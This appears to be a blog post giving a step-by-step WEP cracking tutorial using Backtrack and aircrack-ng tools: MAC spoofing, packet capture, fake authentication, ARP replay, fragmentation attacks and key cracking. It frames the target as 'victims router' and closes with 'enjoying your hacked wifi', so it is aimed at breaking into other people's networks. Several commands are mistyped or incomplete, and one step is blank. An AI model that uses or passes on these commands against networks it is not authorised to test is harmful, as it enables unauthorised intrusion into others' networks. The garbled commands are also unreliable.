Header Ads

WEP cracking - 10 easy steps ?

WEP cracking - 10 easy steps ?

WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root

Password: toor

Once logged in, type in: startx
BT5 r3 is now set up, heres the following.


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start

2. Now we are going to put the network card into monter mode by typing the following.


3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4.Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up

This will make it so we change our MAC address to the computer we are connecting to

5.Time to start finding our victims router, type in konsole.

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0

7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0

8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.

Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap

10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

Here is some alternate methods of using backtrack Tutorial that are interesting and work too.

1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k -l -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

thanks, Ok

Powered by Blogger.